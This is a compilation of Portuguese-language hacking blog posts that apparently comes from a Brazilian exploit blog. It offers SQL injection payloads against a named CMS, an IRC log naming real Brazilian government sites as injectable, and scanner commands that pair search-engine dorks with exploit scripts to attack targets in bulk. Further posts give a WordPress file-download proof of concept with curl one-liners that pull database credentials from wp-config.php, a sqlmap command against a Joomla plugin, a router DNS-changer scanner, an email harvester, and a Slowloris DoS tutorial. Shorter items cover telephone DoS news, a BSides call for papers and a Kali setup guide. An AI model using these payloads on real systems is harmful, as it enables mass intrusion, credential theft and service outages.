TOOL DORKING SCANNER INURLBR 1.0

TOOL DORKING SCANNER INURLBR 1.0:https://github.com/googleinurl/SCANNER-INURLBR
TOOL lfiINURL:
https://github.com/googleinurl/lfiINURL
COMMAND EX:
------------------------------------------------------
inurlbr.php --dork 'br+index.p=' -s vull.txt -q all --comand-all 'URL="_TARGETFULL_&index.p=" && php lfiINURL.php -t $URL -c 10'
inurlbr.php --dork 'include=' -s vull.txt -q all --comand-all 'URL="_TARGETFULL_&include=" && php lfiINURL.php -t $URL -c 10'
inurlbr.php --dork 'cn+page=' -s vull.txt -q all --comand-all 'URL="_TARGETFULL_&page=" && php lfiINURL.php -t $URL -c 10'
inurlbr.php --dork 'cn+page=' -s vull.txt -q all --comand-all 'URL="_TARGETFULL_&page=" && php lfiINURL.php -t $URL -c 10'
------------------------------------------------------
USE linux..



(0DAY) WebDepo - SQL injection

EXPLOIT NAME: MINI exploit-SQLMAP - (0DAY) WebDepo -SQL injection / INURL BRASIL

Nas minhas pesquisas na web, sobre file_upload descobre um CMS da empresa israelense WebDepoo mesmo possui falha de file_upload sem autenticação, mas analisando seus GETS pude observar que também tem falhas SQLi em seus parâmetros GET.

AUTOR:       Cleiton Pinheiro / Nick: GoogleINURL
Blog:             http://blog.inurl.com.br
Twitter:         https://twitter.com/googleinurl
Fanpage:       https://fb.com/InurlBrasil
Pastebin:       http://pastebin.com/u/Googleinurl
GIT:              https://github.com/googleinurl
PSS:              http://packetstormsecurity.com/user/googleinurl
YOUTUBE:  http://youtube.com/c/INURLBrasil
PLUS:           http://google.com/+INURLBrasil



VENTOR:         http://www.webdepot.co.il
GET VULN:     wood=(id) / $wood=intval($_REQUEST['wood'])
  -----------------------------------------------------------------------------

DBMS: 'MySQL'
Exploit:      +AND+(SELECT 8880 FROM(SELECT COUNT(*),CONCAT(0x496e75726c42726173696c,0x3a3a,version(),(SELECT (CASE WHEN (8880=8880) THEN 1 ELSE 0 END)),0x717a727a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

DBMS: 'Microsoft Access'
Exploit:     +UNION+ALL+SELECT+NULL,NULL,NULL,CHR(113)&CHR(112)&CHR(120)&CHR(112)&CHR(113)&CHR(85)&CHR(116)&CHR(106)&CHR(110)&CHR(108)&CHR(90)&CHR(74)&CHR(113)&CHR(88)&CHR(116)&CHR(113)&CHR(118)&CHR(111)&CHR(100)&CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM MSysAccessObjects%16
  -----------------------------------------------------------------------------

http://target.us/text.asp?wood=(id)+Exploit

GOOGLE DORK:   inurl:"text.asp?wood="
GOOGLE DORK:   site:il inurl:"text.asp?wood="
GOOGLE DORK:   site:com inurl:"text.asp?wood="   

Exploit: Clique Aqui

Execute exploit:
--help:
  -t : SET TARGET.
  -f : SET FILE TARGETS.
  -p : SET PROXY
  Execute:
  php WebDepoxpl.php -t target
  php WebDepoxpl.php -f targets.txt
  php WebDepoxpl.php -t target -p 'http://localhost:9090'

EXPLOIT MASS USE SCANNER INURLBR

COMMAND: ./inurlbr.php --dork 'site:il inurl:text.asp?wood= ' -s 0dayWebDepo.txt -q 1,6 --exploit-get "?´'0x27" --comand-all "php 0dayWebDepo.php -t '_TARGET_'"








A segunda falha:

Exploit fckeditor 2015
Vídeo: https://www.youtube.com/watch?v=2g1xxkMVgPk  
GOOGLE DORK: inurl:"/text.asp?wood=" site:il
Exploit: -admin/fckeditor/editor/filemanager/brow­ser/default/browser.html?Connector=conne­ctors/asp/connector.asp


POC:
[1] - http://target.us/target-admin/fckeditor/editor/filemanager/brow­ser/default/browser.html?Connector=conne­ctors/asp/connector.asp

[2] - http://target.us/userfiles/file/{YOU_FILE}


Hackers criam ferramenta que faz ataques DDoS em linhas telefônicas !!








Não são só os sites e serviços da internet que estão sujeitos aos conhecidos ataques de negação de serviço – telefones comuns, sejam eles celulares ou não, também estão sujeitos a sofrerem golpes desse tipo. É o que revelou o site The Register que, nesta segunda-feira (23), trouxe a história do TNT Instant Up, um aparelho criado por hackers do leste da Europa voltado justamente para esse fim.

Vendido na internet por valores que variam entre US$ 500 e US$ 1.200, o equipamento utiliza um sistema interligado de modems e cartões SIM para bombardear um ou mais números com ligações. As chamadas são vazias e servem apenas para congestionar as linhas, impedindo que usuários legítimos consigam acessá-las.

A ideia, aqui, é basicamente a mesma de qualquer ataque DDoS: impedir o uso de serviços. Só que, aqui, eles não são retirados do ar, mas sim acabam apenas congestionados e inutilizáveis enquanto durarem os ataques. A prática está sendo chamada de TDoS, sigla em inglês para Telephone Denial of Service, ou negação de serviço telefônico.

O problema é que, na nova modalidade, os resultados seriam muito mais perigosos. Enquanto a maioria dos golpes desse tipo causam perdas financeiras para as empresas afetadas e inconveniência para seus usuários, o TDoS seria capaz de, por exemplo, bloquear serviços de emergência.



Além disso, o TNT Instant Up seria simples o suficiente para que literalmente qualquer pessoa conseguisse utilizá-lo. Em um vídeo demonstrativo disponível livremente no YouTube, um dos vendedores da ferramenta a exibe em funcionamento com vários celulares ao mesmo tempo, com números que são inseridos a partir de um software rodando em um computador. A negociação com o “comerciante” acontece pelo ICQ ou e-mail e o produto é enviado pelo correio como qualquer eletrônico convencional.

O FBI já teria identificado pelo menos duas circunstâncias em que um dispositivo como o TNT Instant Up foi utilizado para impedir o acesso de usuários a serviços de plano de saúde ou linhas de emergência. Apesar disso, não identificou crimes que estariam sendo realizados em relação ao ataque e que justificariam o bloqueio da linha e a tentativa de impedir que cidadãos contatem a polícia, por exemplo.

De acordo com as informações da IntelCrawler, uma fornecedora de sistemas e soluções de segurança, assim como nos ataques de negação de serviço na web, não existem maneiras de se proteger contra essa nova modalidade de golpe, a não ser, claro, desconectar a linha para que o aparelho pare de tocar sem parar. Uma alternativa que simplesmente não existe para serviços de emergência, principalmente, que agora se tornam alvo de mais uma ferramenta que pode ser usada por qualquer pessoa, seja qual for a intenção dela.







Aberto a Chamada de Trabalhos (CFP) para a próxima edição da Co0L BSidesSP

Aberto a Chamada de Trabalhos (CFP) para a próxima edição da Co0L BSidesSP está aberta !!!
A página abaixo tem os detalhes do CFP e o link para o formulário de submissão de conteúdo. A submissão de palestras e oficinas vai somente até o dia 20/04/2015.
https://garoa.net.br/wiki/O_Outro_Lado_BSidesSP_ed_11/CFP
https://garoa.net.br/wiki/O_Outro_Lado_BSidesSP_ed_11/CFP_EN(English Version)
As atividades devem ter conteúdo relacionado a Segurança da Informação, Cultura Hacker ou qualquer forma de Hacking. Além de palestra e oficinas (com conteúdo mais prático), o CFP também serve para as Lightning Talks e atividades no Hacker Carreer Fair, Brazilian Arsenal e na "Bsides 4 Kids" (atividades voltadas para crianças e adolecentes).
Datas Importantes:
- Data final para submissão de palestras e oficinas: 20/04
- Notificação aos autores selecionados: 23/03
- Divulgação da Agenda: 24/04
- Início das inscrições: 24/04
- Co0L BSidesSP v11: 24/05




Sites .Gov Vulnerável SQLi

[17:01] <googleinurl> http://camaradecostamarques.ro.gov.br/?'´0x27
[17:01] <googleinurl> http://www.casaruibarbosa.gov.br/interna.php?'´0x27
[17:01] <googleinurl> http://www.cmsantafe.pr.gov.br/santafe/noticias.php?p=29?'´0x27
[17:01] <googleinurl> http://arcoverde.pe.gov.br/webnoticias_ler.php?id=2555?'´0x27
[17:01] <googleinurl> http://www.jau.sp.gov.br/secretarias.php?SEC_ID=41?'´0x27
[17:01] <googleinurl> http://www.camaraxaxim.sc.gov.br/noticias/ver_noticia.php?id=77?'´0x27
[17:01] <googleinurl> http://www.cmubaporanga.mg.gov.br/mostra_noticia.php?noticia=000020?'´0x27
[17:01] <googleinurl> http://cmcaratinga.mg.gov.br/mostra_noticia.php?noticia=003111?'´0x27
[17:01] <googleinurl> http://arcoverde.pe.gov.br/webnoticias_ler.php?id=2688?'´0x27
[17:01] <googleinurl> http://www.cmsantaluziadooeste.ro.gov.br/?'´0x27
[17:01] <googleinurl> http://www.itaenga.pe.gov.br/conferencia-do-meio-ambiente.php?'´0x27
[17:01] <googleinurl> http://www.camarajuina.mt.gov.br/vereadores_ver.php?id=8?'´0x27
[17:01] <googleinurl> http://astorga.pr.gov.br/teste/portal/cadastro.php?'´0x27
[17:01] <googleinurl> http://camaradecostamarques.ro.gov.br/?'´0x27
[17:01] <googleinurl> http://www.casaruibarbosa.gov.br/interna.php?'´0x27
[17:01] <googleinurl> http://www.cmsantafe.pr.gov.br/santafe/noticias.php?p=29?'´0x27
[17:01] <googleinurl> http://arcoverde.pe.gov.br/webnoticias_ler.php?id=2555?'´0x27
[17:01] <googleinurl> http://www.jau.sp.gov.br/secretarias.php?SEC_ID=41?'´0x27
[17:01] <googleinurl> http://www.camaraxaxim.sc.gov.br/noticias/ver_noticia.php?id=77?'´0x27
[17:01] <googleinurl> http://www.cmubaporanga.mg.gov.br/mostra_noticia.php?noticia=000020?'´0x27
[17:01] <googleinurl> http://cmcaratinga.mg.gov.br/mostra_noticia.php?noticia=003111?'´0x27
[17:01] <googleinurl> http://arcoverde.pe.gov.br/webnoticias_ler.php?id=2688?'´0x27
[17:01] <googleinurl> http://www.cmsantaluziadooeste.ro.gov.br/?'´0x27
[17:01] <googleinurl> http://www.itaenga.pe.gov.br/conferencia-do-meio-ambiente.php?'´0x27
[17:01] <googleinurl> http://www.camarajuina.mt.gov.br/vereadores_ver.php?id=8?'´0x27
[17:01] <googleinurl> http://astorga.pr.gov.br/teste/portal/cadastro.php?'´0x27
[17:01] <googleinurl> http://camaradecostamarques.ro.gov.br/?'´0x27
[17:01] <googleinurl> http://www.casaruibarbosa.gov.br/interna.php?'´0x27
[17:01] <googleinurl> http://www.cmsantafe.pr.gov.br/santafe/noticias.php?p=29?'´0x27
[17:01] <googleinurl> http://arcoverde.pe.gov.br/webnoticias_ler.php?id=2555?'´0x27
[17:01] <googleinurl> http://www.jau.sp.gov.br/secretarias.php?SEC_ID=41?'´0x27

0days Theme Arbitrary File Download Vulnerability + SCANNER INURLBR / EXPLOIT INURL A.F.D Verification


-------------------------------------------------------------------------------------------

Wordpress Theme U-Design Arbitrary File Download Vulnerability
DORK: inurl:"wp-content/themes/u-design/"
ACCESS: http://1337day.com/exploit/23143
-------------------------------------------------------------------------------------------

Wordpress Theme Terra Arbitrary File Download Vulnerability
DORK: inurl:"wp-content/themes/terra/"
ACCESS: http://1337day.com/exploit/23142
-------------------------------------------------------------------------------------------

Wordpress Theme Pindol Arbitrary File Download Vulnerability
DORK: inurl:"wp-content/themes/pindol/"
ACCESS: http://1337day.com/exploit/23144
-------------------------------------------------------------------------------------------

All themes above, are failing in the same revslider plugin.
POC:
http://[target]/[path]/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
[EXPLOIT]: Wordpress A.F.D Verification/ INURL - BRASIL

Exploit developed can check about 20 themes, and allows check standard as follows.POC -> /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
Which is the same as 0day mentioned above.

[Exploit ACCESS]
http://pastebin.com/ZEnbxXXd
http://packetstormsecurity.com/files/129706/WordPress-Themes-download.php-File-Disclosure.html
Please download the exploit and put the name of exploit.php

Now let's use the inurlbr scanner as a mass explorer
[SCANNER INURLBR]
https://github.com/googleinurl/SCANNER-INURLBR

Command use INURLBR:
Ex: php inurlbr.php --dork 'you dork' -q 1,6 -s save.txt --comand-all 'php exploit.php _TARGET_'

php inurlbr.php --dork 'inurl:"wp-content/themes/u-design/"' -q 1,6 -s save.txt --comand-all 'php exploit.php _TARGET_'

php inurlbr.php --dork 'inurl:"wp-content/themes/terra/"' -q 1,6 -s save.txt --comand-all 'php exploit.php _TARGET_'

php inurlbr.php --dork 'inurl:"wp-content/themes/pindol/"' -q 1,6 -s save.txt --comand-all 'php exploit.php _TARGET_'

Brief introduction --comand
--comand-vul Every vulnerable URL found will execute this command parameters.
     Example: --comand-vul {command}
     Usage:   --comand-vul 'nmap sV -p 22,80,21 _TARGET_'
              --comand-vul './exploit.sh _TARGET_ output.txt'
 --comand-all Use this commmand to specify a single command to EVERY URL found.
     Example: --comand-all {command}
     Usage:   --comand-all 'nmap sV -p 22,80,21 _TARGET_'
              --comand-all './exploit.sh _TARGET_ output.txt'
    Observation:
    _TARGET_ will be replaced by the URL/target found, although if the user
    doesn't input the get, only the domain will be executed.
   _TARGETFULL_ will be replaced by the original URL / target found.

-------------------------------------------------------------------------------------------

INURLBR ADVANCED CONTROL

php inurlbr.php --dork 'YOU DORK revslider' -q 1,6 -s wordpress2.txt --exploit-get '/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php' -t 3 --exploit-comand '/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php' --comand-all 'echo "_TARGET__EXPLOIT_">> curlwordpress.txt;curl "_TARGET__EXPLOIT_"|grep "DB_" >> curlwordpress.txt;curl "_TARGET__EXPLOIT_"|grep "DB_"'

[TUTORIAL] - Wordpress A.F.D Verification/ INURL - BRASIL + SCANNER INURLBR Video Aqui

[TUTORIAL] - Hacking Painel Wordpress - Slider Revolution Video Aqui

[TUTORIAL] - Getting access to the Wordpress panel  Video Aqui




0x06 - SCANNER RouterhuntertBR 1.0

Inicialmente o RouterhunterBR foi desenvolvido para explorar vulnerabilidades DNSChanger em routers caseiros que possuem falhas em paginas sem autenticação dentro do roteador, Assim modificando o DNS padrão dentro do roteador.
O RouterhunterBR funciona da seguinte maneira, ele roda pela internet procurando por faixas de ips pre-definidas ou aleatórias com intuito de explorar vulnerabilidade DNSChanger em routers(roteadores) caseiros. Por inicio está e a principal função do RouterHunterBR.

Explora:
  • 01 - Shuttle Tech ADSL Modem-Router 915 WM / Unauthenticated Remote DNS Change Exploit 
  • 02 - D-Link DSL-2740R / Unauthenticated Remote DNS Change Exploit 
  • 03 - LG DVR LE6016D / Unauthenticated users/passwords disclosure exploit


Feito em PHP faz varreduras em faixas de ips pré-definidas ou alearias com números limites, até mesmo usando um arquivo fonte como referencias de ip.

- SET PROXY.
- USER AGENT RANDÔMICO.
- SAVE OUTPUT FILE.
[DOWNLOAD] 


0x05 - INURLMAIL

Busca lista de emails. Objetivo usar o motor de busca Google para capturar email list. A cada URL encontrada pelo buscador, será efetuado um filtro capturando os emails contidos na URL.
[DOWNLOAD]

MINI EXPLOIT: Joomla Simple Photo Gallery - SQL injection + VIDEO

Usando miniexploit para explorar em massa vários alvos.

Title: Joomla Simple Photo Gallery - SQL injection
Date : 13-03-2015
Vendor Homepage: https://www.apptha.com/
Source Plugin: https://www.apptha.com/category/extension/joomla/simple-photo-gallery
Version : 1
Tested on : sqlmap

POC:
http://{$target}/index.php?option=com_simplephotogallery&view=images&albumid=[SQLI]

Comando SQLMAP de exploração:
sqlmap  -u '{$target}/index.php?option=com_simplephotogallery&view=images&albumid=1' -p albumid --batch --dbms=MySQL --proxy 'http://localhost:8118' --random-agent --level 2 --risk 1 --eta --answers='follow=N' --dbs --is-dba

DORK de pesquisa:
Dork Google 1: inurl:/com_simplephotogallery site:com
Dork Google 2: inurl:/com_simplephotogallery site:org
Dork Google 3: inurl:/com_simplephotogallery site:fr
Dork Google 4: inurl:/com_simplephotogallery/


Agora vamos organizar nosso comando INURLBR  para executar nosso miniexploit.php
Primeiro vamos organizar o parâmetro --dork que captura seu filtro de busca.

 --dork Defines which dork the search engine will use.
     Example: --dork {dork}
     Usage:   --dork 'site:.gov.br inurl:php? id'
     - Using multiples dorks:
     Example: --dork {[DORK]dork1[DORK]dork2[DORK]dork3}
     Usage:   --dork '[DORK]site:br[DORK]site:ar inurl:php[DORK]site:il inurl:asp'
Parâmetro organizado:
--dork '[DORK]inurl:/com_simplephotogallery site:com[DORK]inurl:/com_simplephotogal lery site:org[DORK]inurl:/com_simplephotogallery site:fr[DORK]inurl:/com_simplephotogallery/'

Baixar MINI exploit-SQLMAP / Joomla Simple Photo Gallery 1.0 - SQL injection: 
http://pastebin.com/Gb5uhPKW
File: miniexploit.php
Baixar scanner INURLBR 1.0:
https://github.com/googleinurl/SCANNER-INURLBR
File: inurlbr.php


Executando:
./inurlbr.php --dork '[DORK]inurl:/com_simplephotogallery site:com[DORK]inurl:/com_simplephotogal lery site:org[DORK]inurl:/com_simplephotogallery site:fr[DORK]inurl:/com_simplephotogallery/' -s save.txt -q 1,6 --command-all "php miniexploit2.php '_TARGET_'"



Tutorial Slowloris [PT-BR] - BackTrack

Este é o mais tradicional e eficiente DoS(Denial of Service) de conhecimento público, que conheço.
Se você está querendo deixar um servidor HTTP lento, ou mesmo sair do ar, este é adequado para tanto.
Obvio, que estamos considerando serviços HTTP sem proteção para DoS deste tipo, que é a maioria, por incrível que possa parecer.
Este pode ser baixado em  Slowloris Download

Falemos sobre alguns exemplos:

Para fazer um DoS na porta 80(padrão HTTP), com 500 conexões simultâneas, com 2000 segundos de timeout de janela TCP e incremento de 5 segundos para o timeout TCP, faça como abaixo:


perl slowloris.pl -dns www.dominio.com.br -port 80 -timeout 2000 -num 500 -tcpto 5

Até Mais

Tutorial: Explorando vulnerabilidade em roteador tp-link

Olá
Gostaria de mostrar dessa vez uma vulnerabilidade encontrada nos roteadores TP-Link WR740N, WR740ND and WR2543ND
Essa vulnerabilidade permite a captura do conteúdo do arquivo shadow que contém as senhas de acesso ao roteador.
Para conseguir essa informação você pode usar o burp-suite disponível no backtrack, para isso abra a ferramenta, vá em repeater, digite o ip do alvo e clique em go. após isso vc pode editar a requisição conforme abaixo e clicar em go novamente o resultado será semelhante ao abaixo.
ScreenHunter_06 Mar. 11 18.40
Agora com um pouco mais de trabalho vc consegue consegue quebrar essa senha, mas aí é assunto pra outro post.
Espero que tenham gostado.
Não se esqueça de compartilhar.
Abraços

Dica para pentest: Descobrindo contas de usuário no Oracle com o Nmap

Olá a todos mais uma vez
Gostaria de passar hoje uma dica para quem for executar um pentest, ou apenas para aprendizado mesmo.
Com essa dica é possível obter informações como SID de um BD Oracle e também fazer o levantamento de contas de usuário disponíveis usando apenas o nmap.
basta fazer o seguinte:
Execute o comando:
nmap --script oracle-sid-brute 192.168.0.12
O resultado será algo semelhante ao abaixo onde no nosso caso o SID é o ORCL
ScreenHunter_06 Mar. 11 13.22
Feito isso basta executar o próximo comando:
nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=ORCL 192.168.0.12
ScreenHunter_06 Mar. 11 13.27

Com isso obtemos uma lista de contas disponíveis no servidor de banco de dados oracle.
Espero que tenham gostado da dica e não se esqueça de compartilhar
Abraços

Tutorial: Usando o nmap para verificação de vulnerabilidades

Olá a todos mais uma vez
Desta vez gostaria de mostrar pra vocês como usar o nmap para checar a existência da vulnerabilidade MS08-067, para quem não conhece essa vulnerabilidade pode ser explorada pelo Worm Conficker. Algumas ferramentas como Metasploit também podem ser usadas para explorar essa vulnerabilidade, basta usar o seguinte comando:
nmap --script smb-check-vulns.nse -p445 <host> (No de um host alvo apenas)



"nmap -PN -T4 -p139,445 -n -v --script=smb-check-vulns --script-args
safe=1 [target networks] (No caso de escanear todo um segmento de rede)"

A resposta será algo parecido com isso informando se o alvo é vulnerável ou não

Host script results:
| smb-check-vulns:  
|   MS08-067: NOT VULNERABLE
|   Conficker: Likely CLEAN
|   regsvc DoS: regsvc DoS: NOT VULNERABLE
|   SMBv2 DoS (CVE-2009-3103): NOT VULNERABLE
|   MS06-025: NO SERVICE (the Ras RPC service is inactive)
|_  MS07-029: NO SERVICE (the Dns Server RPC service is inactive)
Caso vc encontre uma máquina vulnerável vc pode explorer essa falha usando essa dica aqui

Tutorial: Usando nmap para listar plugins do WordPress

Bem vindos novamente
Dessa vez vou mostrar como usar a poderosa ferramenta do nmap para listar plugins instalados em uma instalação do wordpress
"nmap --script=http-wordpress-plugins --script-args
 http-wordpress-plugins.root="/blog/",
http-wordpress-plugins.search=500 <targets>"



O Resultado será uma lista com os plugins que foram localizados na instalação do wordpress.

Se gostou da dica, por favor compartilhe!

Até a próxima

Tutorial: Instalando e fazendo as configurações iniciais do Kali Linux no Virtual Box

Olá a todos
Gostaria de mostrar pra vocês como instalar e configurar o Kali Linux no Virtual Box bem como fazer as configurações iniciais que na minha opinião são indispensáveis.
O Kali Linux é uma evolução do Backtrack e pode ser baixado aqui http://www.kali.org, ele é mantido pela mesma empresa de segurança do Backtrack.
Algumas vantagens que vi no Kali é que ele é baseado em Debian e muitas ferramentas que davam algum problema no Backtrack, aqui até o momento funcionam sem problemas.
Vou mostrar como criar a máquina virtual, instalar o Kali, instalar o VBOX additions, TOR e também o EtherAPE que tinha no backtrack e não por padrão no Kali. No final vou colocar um link com uma série de tutoriais que podem ser executados usando o Kali. Vamos lá?
1 – Criar a máquina virtual:
Vamos criar uma nova e atribuir um nome
ScreenHunter_07 Apr. 03 16.09
Aqui vamos atribuir a quantidade de memória RAM, no caso coloquei 1GB
ScreenHunter_08 Apr. 03 16.09
Vá avançando nas opções padrão até chegar no tamanho do disco, no caso, coloquei 50GB
ScreenHunter_11 Apr. 03 16.10
Antes de inicializar a máquina vá em configurações da VM e mude a placa de rede para Bridged Adapter, isso para que a VM possa acesar o próprio hardware da máquina física.
ScreenHunter_11 Apr. 03 16.11
Nesta opção selecione o CD-ROM e escolha o arquivo ISO do Kali Linux que foi baixado do site
ScreenHunter_12 Apr. 03 16.11
2 – Instalar o Kali Linux
Tudo feito corretamente, bastar iniciar a VM e a tela inicial será essa onde podemos escolher a opção “Graphical Install”
ScreenHunter_12 Apr. 03 16.12
Nesta tela e nas seguintes será possível configurar o idioma, teclado e fuso horário, faça as configurações conforme achar melhorScreenHunter_13 Apr. 03 16.12
Aqui podemos definir um hostname que desejarmos, e na próxima tela, pode ser colocado um sufixo, caso vc tenha um, ou pode deixar em branco mesmo
ScreenHunter_14 Apr. 03 16.14
Defina a senha do usuário Root
ScreenHunter_15 Apr. 03 16.15
Avançando até essa tela podemos usar a primeira opção para o particionamento do disco, a próxima tela é só avançar
ScreenHunter_16 Apr. 03 16.16
Nessa tela, podemos selecionar a primeira opção e avançar
ScreenHunter_18 Apr. 03 16.16
Podemos avançar, e na próxima tela selecionar “YES”
ScreenHunter_18 Apr. 03 16.17
Aguarde a instalação, e nessa, parte se você sua rede já configurada para fornecer um IP e com acesso a internet, vc pode selecionar a opção “Yes”.
ScreenHunter_19 Apr. 03 16.36
Caso tenha um proxy você pode configurar aqui ou simplesmente deixar em branco e avançar
ScreenHunter_20 Apr. 03 16.36
Selecione “Yes” e aguarde a conclusão da Instalação, Ao reiniciar é logar com usuário Root e a senha que vc configurou.
ScreenHunter_20 Apr. 03 16.44
3 – Configurações iniciais.
O primeiro passo é instalar o VBOX Additions para isso faça o seguinte abra um terminal e digite:
apt-get update && apt-get install -y linux-headers-$(uname -r)
Aguarde a conclusão da instalação
Feito isso vá no Menu “Devices” do Virtual Box e clique em “Install Guest Additions”
ScreenHunter_20 Apr. 03 16.57
Quando for exibido essa tela, clique em cancelar
ScreenHunter_20 Apr. 03 17.00
Execute agora os seguintes comandos no terminal.
cp /media/cdrom0/VBoxLinuxAdditions.run /root/
chmod 755 /root/VBoxLinuxAdditions.run
./VBoxLinuxAdditions.run
Aguarde a conclusão da instalação e reinicie a VM
Após reiniciar, outra coisa que podemos configurar é o metasploit framework para isso faça o seguinte, abra um terminal e digite:
service postgresql start && service metasploit start
aguarde a conclusão e depois digite:
update-rc.d postgresql enable && update-rc.d metasploit enable
Para iniciar basta acessar conforme a imagem
metasploit-kali-metasploit-framework
Outra configuração inicial interessante de se fazer é a configuração do TOR para navegação anônima para isso vamos fazer o seguinte:
apt-get install tor tor-geoipdb polipo vidalia
Feito isso digite
mkdir /var/run/tor
chmod 700 /var/run/tor/
Vamos configurar o polipo para acessar através do tor para isso digite
vim /etc/polipo/config
Descomente as linhas
allowedClientes 127.0.0.1
socksParentProxy = “localhost:9050?
socksParentType = socks5
salve e saia do arquivo e digite
service tor restart
service polipo restart
Daí para navegar anônimo basta configurar no navegador o proxy http para 127.0.0.1 porta 8123 ou proxy socs5 para 127.0.0.1 porta 9050
Também pode ser usado para configurar em outras aplicações que suportem acesso via proxy
Para instalar o EtherApe basta digitar
apt-get install etherape
Aguarde a conclusão e ele vai estar disponível em Applications/Internet.
Agora, caso queira, basta ler nossa série de tutorias para pentest usando Kali Linux disponível do link abaixo
Espero que tenham gostado dessa dica e por gentileza não deixem de compartilhar
Até a próxima